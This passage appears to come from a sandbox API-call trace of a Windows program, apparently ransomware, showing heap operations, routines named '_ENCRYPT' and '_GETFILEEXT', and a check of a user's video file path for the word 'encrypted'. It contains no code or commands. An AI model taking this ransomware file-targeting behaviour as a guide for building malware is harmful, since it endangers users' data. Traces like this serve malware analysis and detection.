Flags=0x0, Size=0x10) returned 0x88cc88 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.372] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0043.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.374] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0043.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0043.374] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0043.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.375] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.376] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0043.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8898c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.376] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.376] CloseHandle (hObject=0x128) returned 1 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.377] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.377] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.377] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.377] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.377] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.377] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.378] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.378] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.378] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.378] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.378] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.378] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.378] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.378] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7aab80, ftCreationTime.dwHighDateTime=0x1d5bbb4, ftLastAccessTime.dwLowDateTime=0xb609cf10, ftLastAccessTime.dwHighDateTime=0x1d5ba6f, ftLastWriteTime.dwLowDateTime=0xb609cf10, ftLastWriteTime.dwHighDateTime=0x1d5ba6f, nFileSizeHigh=0x0, nFileSizeLow=0xe9d3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="9QOf4ezMoY.mkv", cAlternateFileName="9QOF4E~1.MKV")) returned 0x7c20c0 [0043.378] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.378] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7aab80, ftCreationTime.dwHighDateTime=0x1d5bbb4, ftLastAccessTime.dwLowDateTime=0xb609cf10, ftLastAccessTime.dwHighDateTime=0x1d5ba6f, ftLastWriteTime.dwLowDateTime=0xb609cf10, ftLastWriteTime.dwHighDateTime=0x1d5ba6f, nFileSizeHigh=0x0, nFileSizeLow=0xe9d3, dwReserved0=0x0, dwReserved1=0x777648, cFileName="9QOf4ezMoY.mkv", cAlternateFileName="9QOF4E~1.MKV")) returned 0x7c20c0 [0043.378] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.378] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.378] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.378] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.378] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.378] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\9QOf4ezMoY.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 